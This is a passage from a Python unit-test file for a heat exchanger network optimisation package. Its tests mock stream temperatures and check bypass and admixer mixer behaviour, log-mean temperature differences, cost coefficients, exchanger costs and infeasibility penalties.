logarithmic_mean_temperature_difference = test_exchanger.operation_parameter.heat_loads[operating_case] / (test_exchanger.operation_parameter.overall_heat_transfer_coefficients[operating_case] * test_exchanger.operation_parameter.area)
assert logarithmic_mean_temperature_difference == test_exchanger.operation_parameter.logarithmic_mean_temperature_differences[operating_case]
def test_mixer_type(monkeypatch):
test_exchanger, test_case, _, test_parameter = setup_module()
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
test_parameter.heat_loads[:, :] = 2000
monkeypatch.setattr('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.random_choice.__defaults__', (0,))
assert 'admixer_cold' in test_exchanger.operation_parameter.mixer_types
monkeypatch.setattr('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.random_choice.__defaults__', (None,))
test_exchanger.operation_parameter.one_mixer_per_hex = False
del test_exchanger.operation_parameter.__dict__['mixer_types']
base_case = np.squeeze(np.argwhere(test_exchanger.operation_parameter.needed_areas == test_exchanger.operation_parameter.area))
for operating_case in test_case.range_operating_cases:
if operating_case != base_case:
assert test_exchanger.operation_parameter.mixer_types[operating_case] != test_exchanger.operation_parameter.mixer_types[base_case]
def test_bypass_hot_stream():
test_exchanger, test_case, _, test_parameter = setup_module()
with mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'bypass_hot']
test_parameter.heat_loads[:, :] = 2000
for operating_case in test_case.range_operating_cases:
assert test_exchanger.operation_parameter.inlet_temperatures_hot_stream[operating_case] == test_exchanger.operation_parameter.temperatures_hot_stream_before_hex[operating_case]
assert test_exchanger.operation_parameter.inlet_temperatures_cold_stream[operating_case] == test_exchanger.operation_parameter.temperatures_cold_stream_before_hex[operating_case]
assert test_exchanger.operation_parameter.outlet_temperatures_cold_stream[operating_case] == test_exchanger.operation_parameter.temperatures_cold_stream_after_hex[operating_case]
if operating_case == 0:
assert test_exchanger.operation_parameter.outlet_temperatures_hot_stream[operating_case] == test_exchanger.operation_parameter.temperatures_hot_stream_after_hex[operating_case]
elif operating_case == 1:
assert abs(test_exchanger.operation_parameter.outlet_temperatures_hot_stream[operating_case] - (test_exchanger.operation_parameter.temperatures_hot_stream_after_hex[operating_case] - test_exchanger.operation_parameter.temperatures_hot_stream_before_hex[operating_case] * test_exchanger.operation_parameter.mixer_fractions_hot_stream[operating_case]) / (1 - test_exchanger.operation_parameter.mixer_fractions_hot_stream[operating_case])) <= 10e-3
temperature_difference_1 = test_exchanger.operation_parameter.outlet_temperatures_hot_stream[operating_case] - test_exchanger.operation_parameter.inlet_temperatures_cold_stream[operating_case]
temperature_difference_2 = test_exchanger.operation_parameter.inlet_temperatures_hot_stream[operating_case] - test_exchanger.operation_parameter.outlet_temperatures_cold_stream[operating_case]
if temperature_difference_1 == temperature_difference_2:
logarithmic_mean_temperature_difference = temperature_difference_1
else:
logarithmic_mean_temperature_difference = (temperature_difference_1 - temperature_difference_2) / np.log(temperature_difference_1 / temperature_difference_2)
assert logarithmic_mean_temperature_difference - test_exchanger.operation_parameter.logarithmic_mean_temperature_differences[operating_case] <= 10e-3
def test_admixer_hot_stream():
test_exchanger, test_case, _, test_parameter = setup_module()
with mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'admixer_hot']
test_parameter.heat_loads[:, :] = 2000
for operating_case in test_case.range_operating_cases:
assert test_exchanger.operation_parameter.outlet_temperatures_hot_stream[operating_case] == test_exchanger.operation_parameter.temperatures_hot_stream_after_hex[operating_case]
assert test_exchanger.operation_parameter.inlet_temperatures_cold_stream[operating_case] == test_exchanger.operation_parameter.temperatures_cold_stream_before_hex[operating_case]
assert test_exchanger.operation_parameter.outlet_temperatures_cold_stream[operating_case] == test_exchanger.operation_parameter.temperatures_cold_stream_after_hex[operating_case]
if operating_case == 0:
assert test_exchanger.operation_parameter.inlet_temperatures_hot_stream[operating_case] == test_exchanger.operation_parameter.temperatures_hot_stream_before_hex[operating_case]
elif operating_case == 1:
assert abs(test_exchanger.operation_parameter.inlet_temperatures_hot_stream[operating_case] - (test_exchanger.operation_parameter.temperatures_hot_stream_before_hex[operating_case] + test_exchanger.operation_parameter.temperatures_hot_stream_after_hex[operating_case] * test_exchanger.operation_parameter.mixer_fractions_hot_stream[operating_case]) / (1 + test_exchanger.operation_parameter.mixer_fractions_hot_stream[operating_case])) <= 10e-3
temperature_difference_1 = test_exchanger.operation_parameter.outlet_temperatures_hot_stream[operating_case] - test_exchanger.operation_parameter.inlet_temperatures_cold_stream[operating_case]
temperature_difference_2 = test_exchanger.operation_parameter.inlet_temperatures_hot_stream[operating_case] - test_exchanger.operation_parameter.outlet_temperatures_cold_stream[operating_case]
if temperature_difference_1 == temperature_difference_2:
logarithmic_mean_temperature_difference = temperature_difference_1
else:
logarithmic_mean_temperature_difference = (temperature_difference_1 - temperature_difference_2) / np.log(temperature_difference_1 / temperature_difference_2)
assert logarithmic_mean_temperature_difference - test_exchanger.operation_parameter.logarithmic_mean_temperature_differences[operating_case] <= 10e-3
def test_bypass_cold_stream():
test_exchanger, test_case, _, test_parameter = setup_module()
with mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'bypass_cold']
test_parameter.heat_loads[:, :] = 2000
for operating_case in test_case.range_operating_cases:
assert test_exchanger.operation_parameter.inlet_temperatures_hot_stream[operating_case] == test_exchanger.operation_parameter.temperatures_hot_stream_before_hex[operating_case]
assert test_exchanger.operation_parameter.outlet_temperatures_hot_stream[operating_case] == test_exchanger.operation_parameter.temperatures_hot_stream_after_hex[operating_case]
assert test_exchanger.operation_parameter.inlet_temperatures_cold_stream[operating_case] == test_exchanger.operation_parameter.temperatures_cold_stream_before_hex[operating_case]
if operating_case == 0:
assert test_exchanger.operation_parameter.outlet_temperatures_cold_stream[operating_case] == test_exchanger.operation_parameter.temperatures_cold_stream_after_hex[operating_case]
elif operating_case == 1:
assert abs(test_exchanger.operation_parameter.outlet_temperatures_cold_stream[operating_case] - (test_exchanger.operation_parameter.temperatures_cold_stream_after_hex[operating_case] - test_exchanger.operation_parameter.temperatures_cold_stream_before_hex[operating_case] * test_exchanger.operation_parameter.mixer_fractions_cold_stream[operating_case]) / (1 - test_exchanger.operation_parameter.mixer_fractions_cold_stream[operating_case])) <= 10e-3
temperature_difference_1 = test_exchanger.operation_parameter.outlet_temperatures_hot_stream[operating_case] - test_exchanger.operation_parameter.inlet_temperatures_cold_stream[operating_case]
temperature_difference_2 = test_exchanger.operation_parameter.inlet_temperatures_hot_stream[operating_case] - test_exchanger.operation_parameter.outlet_temperatures_cold_stream[operating_case]
if temperature_difference_1 == temperature_difference_2:
logarithmic_mean_temperature_difference = temperature_difference_1
else:
logarithmic_mean_temperature_difference = (temperature_difference_1 - temperature_difference_2) / np.log(temperature_difference_1 / temperature_difference_2)
assert logarithmic_mean_temperature_difference - test_exchanger.operation_parameter.logarithmic_mean_temperature_differences[operating_case] <= 10e-3
def test_admixer_cold_stream():
test_exchanger, test_case, _, test_parameter = setup_module()
with mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'admixer_cold']
test_parameter.heat_loads[:, :] = 2000
for operating_case in test_case.range_operating_cases:
assert test_exchanger.operation_parameter.inlet_temperatures_hot_stream[operating_case] == test_exchanger.operation_parameter.temperatures_hot_stream_before_hex[operating_case]
assert test_exchanger.operation_parameter.outlet_temperatures_hot_stream[operating_case] == test_exchanger.operation_parameter.temperatures_hot_stream_after_hex[operating_case]
assert test_exchanger.operation_parameter.outlet_temperatures_cold_stream[operating_case] == test_exchanger.operation_parameter.temperatures_cold_stream_after_hex[operating_case]
if operating_case == 0:
assert test_exchanger.operation_parameter.inlet_temperatures_cold_stream[operating_case] == test_exchanger.operation_parameter.temperatures_cold_stream_before_hex[operating_case]
elif operating_case == 1:
assert abs(test_exchanger.operation_parameter.inlet_temperatures_cold_stream[operating_case] - (test_exchanger.operation_parameter.temperatures_cold_stream_before_hex[operating_case] + test_exchanger.operation_parameter.temperatures_cold_stream_after_hex[operating_case] * test_exchanger.operation_parameter.mixer_fractions_cold_stream[operating_case]) / (1 + test_exchanger.operation_parameter.mixer_fractions_cold_stream[operating_case])) <= 10e-3
temperature_difference_1 = test_exchanger.operation_parameter.outlet_temperatures_hot_stream[operating_case] - test_exchanger.operation_parameter.inlet_temperatures_cold_stream[operating_case]
temperature_difference_2 = test_exchanger.operation_parameter.inlet_temperatures_hot_stream[operating_case] - test_exchanger.operation_parameter.outlet_temperatures_cold_stream[operating_case]
if temperature_difference_1 == temperature_difference_2:
logarithmic_mean_temperature_difference = temperature_difference_1
else:
logarithmic_mean_temperature_difference = (temperature_difference_1 - temperature_difference_2) / np.log(temperature_difference_1 / temperature_difference_2)
assert logarithmic_mean_temperature_difference - test_exchanger.operation_parameter.logarithmic_mean_temperature_differences[operating_case] <= 10e-3
def test_costs_coefficients():
test_exchanger, test_case, _, _ = setup_module()
base_costs = test_case.initial_exchanger_address_matrix['c_0_HEX'][0]
assert base_costs == test_exchanger.costs.base_costs
specific_area_costs = test_case.initial_exchanger_address_matrix['c_A_HEX'][0]
assert specific_area_costs == test_exchanger.costs.specific_area_costs
degression_area = test_case.initial_exchanger_address_matrix['d_f_HEX'][0]
assert degression_area == test_exchanger.costs.degression_area
remove_costs = test_case.initial_exchanger_address_matrix['c_R_HEX'][0]
assert remove_costs == test_exchanger.costs.remove_costs
base_split_costs = test_case.initial_exchanger_address_matrix['c_0_split'][0]
assert base_split_costs == test_exchanger.costs.base_split_costs
specific_split_costs = test_case.initial_exchanger_address_matrix['c_M_split'][0]
assert specific_split_costs == test_exchanger.costs.specific_split_costs
degression_split = test_case.initial_exchanger_address_matrix['d_f_split'][0]
assert degression_split == test_exchanger.costs.degression_split
remove_split_costs = test_case.initial_exchanger_address_matrix['c_R_split'][0]
assert remove_split_costs == test_exchanger.costs.remove_split_costs
base_bypass_costs = test_case.initial_exchanger_address_matrix['c_0_bypass'][0]
assert base_bypass_costs == test_exchanger.costs.base_bypass_costs
specific_bypass_costs = test_case.initial_exchanger_address_matrix['c_M_bypass'][0]
assert specific_bypass_costs == test_exchanger.costs.specific_bypass_costs
degression_bypass = test_case.initial_exchanger_address_matrix['d_f_bypass'][0]
assert degression_bypass == test_exchanger.costs.degression_bypass
remove_bypass_costs = test_case.initial_exchanger_address_matrix['c_R_bypass'][0]
assert remove_bypass_costs == test_exchanger.costs.remove_bypass_costs
base_admixer_costs = test_case.initial_exchanger_address_matrix['c_0_admixer'][0]
assert base_admixer_costs == test_exchanger.costs.base_admixer_costs
specific_admixer_costs = test_case.initial_exchanger_address_matrix['c_M_admixer'][0]
assert specific_admixer_costs == test_exchanger.costs.specific_admixer_costs
degression_admixer = test_case.initial_exchanger_address_matrix['d_f_admixer'][0]
assert degression_admixer == test_exchanger.costs.degression_admixer
remove_admixer_costs = test_case.initial_exchanger_address_matrix['c_R_admixer'][0]
assert remove_admixer_costs == test_exchanger.costs.remove_admixer_costs
base_repipe_costs = test_case.initial_exchanger_address_matrix['c_0_repipe'][0]
assert base_repipe_costs == test_exchanger.costs.base_repipe_costs
specific_repipe_costs = test_case.initial_exchanger_address_matrix['c_M_repipe'][0]
assert specific_repipe_costs == test_exchanger.costs.specific_repipe_costs
degression_repipe = test_case.initial_exchanger_address_matrix['d_f_repipe'][0]
assert degression_repipe == test_exchanger.costs.degression_repipe
base_resequence_costs = test_case.initial_exchanger_address_matrix['c_0_resequence'][0]
assert base_resequence_costs == test_exchanger.costs.base_resequence_costs
specific_resequence_costs = test_case.initial_exchanger_address_matrix['c_M_resequence'][0]
assert specific_resequence_costs == test_exchanger.costs.specific_resequence_costs
degression_resequence = test_case.initial_exchanger_address_matrix['d_f_resequence'][0]
assert degression_resequence == test_exchanger.costs.degression_resequence
def test_heat_exchanger_costs():
test_exchanger, test_case, test_addresses, test_parameter = setup_module()
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
test_parameter.heat_loads[:, :] = 5000
exchanger_costs = test_exchanger.costs.base_costs + test_exchanger.costs.specific_area_costs * (test_exchanger.operation_parameter.area - test_exchanger.operation_parameter.initial_area)**test_exchanger.costs.degression_area
assert exchanger_costs == test_exchanger.exchanger_costs
for operating_case in test_case.range_operating_cases:
test_parameter.heat_loads[:, operating_case] = 5000 * 10e-2
assert test_exchanger.exchanger_costs == 0
test_addresses.matrix[0, 7] = False
assert test_exchanger.exchanger_costs == test_exchanger.costs.remove_costs
test_exchanger_5 = HeatExchanger(test_addresses, test_parameter, test_case, 5)
test_addresses.matrix[5, 7] = True
test_parameter.heat_loads[:, :] = 5000
exchanger_costs_5 = test_exchanger_5.costs.base_costs + test_exchanger_5.costs.specific_area_costs * (test_exchanger_5.operation_parameter.area - test_exchanger_5.operation_parameter.initial_area)**test_exchanger_5.costs.degression_area
assert exchanger_costs_5 == test_exchanger_5.exchanger_costs
test_addresses.matrix[5, 7] = False
assert test_exchanger_5.exchanger_costs == 0
def test_admixer_costs():
test_exchanger, _, addresses, _ = setup_module()
addresses.matrix[0, 4] = True
addresses.matrix[0, 6] = True
assert test_exchanger.admixer_costs == test_exchanger.costs.base_admixer_costs * 2
addresses.matrix[0, 4] = False
addresses.matrix[0, 6] = True
assert test_exchanger.admixer_costs == test_exchanger.costs.base_admixer_costs + test_exchanger.costs.remove_admixer_costs
addresses.matrix[0, 4] = False
addresses.matrix[0, 6] = False
assert test_exchanger.admixer_costs == 0
addresses.matrix[0, 4] = True
addresses.matrix[0, 6] = False
assert test_exchanger.admixer_costs == test_exchanger.admixer_costs == test_exchanger.costs.base_admixer_costs
def test_bypass_costs():
test_exchanger, _, addresses, _ = setup_module()
addresses.matrix[0, 3] = True
addresses.matrix[0, 5] = False
assert test_exchanger.bypass_costs == 0
addresses.matrix[0, 3] = False
addresses.matrix[0, 5] = True
assert test_exchanger.bypass_costs == test_exchanger.costs.remove_bypass_costs + test_exchanger.costs.base_bypass_costs
addresses.matrix[0, 3] = False
addresses.matrix[0, 5] = False
assert test_exchanger.bypass_costs == test_exchanger.costs.remove_bypass_costs
addresses.matrix[0, 3] = True
addresses.matrix[0, 5] = True
assert test_exchanger.bypass_costs == test_exchanger.costs.base_bypass_costs
def test_infeasibility_temperature_differences():
test_exchanger, test_case, test_addresses, test_parameter = setup_module()
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.inlet_temperatures_hot_stream', new_callable=mock.PropertyMock) as mock_property_6, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_cold_stream', new_callable=mock.PropertyMock) as mock_property_7:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'bypass_hot']
mock_property_6.return_value = [500, 300]
mock_property_7.return_value = [400, 200]
test_parameter.heat_loads[:, :] = 2000
assert not test_exchanger.infeasibility_temperature_differences[0]
test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.inlet_temperatures_hot_stream', new_callable=mock.PropertyMock) as mock_property_6, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_cold_stream', new_callable=mock.PropertyMock) as mock_property_7:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'bypass_hot']
mock_property_6.return_value = [500, 300]
mock_property_7.return_value = [400, 350]
test_parameter.heat_loads[:, :] = 2000
assert test_exchanger.infeasibility_temperature_differences[0]
assert test_exchanger.infeasibility_temperature_differences[1] == (0 - np.sum(1))**2
test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.inlet_temperatures_hot_stream', new_callable=mock.PropertyMock) as mock_property_6, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_cold_stream', new_callable=mock.PropertyMock) as mock_property_7:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'bypass_hot']
mock_property_6.return_value = [500, 300]
mock_property_7.return_value = [600, 200]
test_parameter.heat_loads[:, :] = 2000
assert test_exchanger.infeasibility_temperature_differences[0]
assert test_exchanger.infeasibility_temperature_differences[1] == (0 - np.sum(1))**2
def test_infeasibility_mixer():
test_exchanger, test_case, test_addresses, test_parameter = setup_module()
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_hot_stream', new_callable=mock.PropertyMock) as mock_property_6:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'bypass_hot']
mock_property_6.return_value = [500, 274]
test_parameter.heat_loads[:, :] = 2000
assert not test_exchanger.infeasibility_mixer[0]
assert test_exchanger.infeasibility_mixer[1] == 0
test_exchanger = HeatExchanger(test_addresses, test_parameter, test_case, 0)
with mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_1, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_hot_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_2, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_hot_stream', new_callable=mock.PropertyMock) as mock_property_6:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
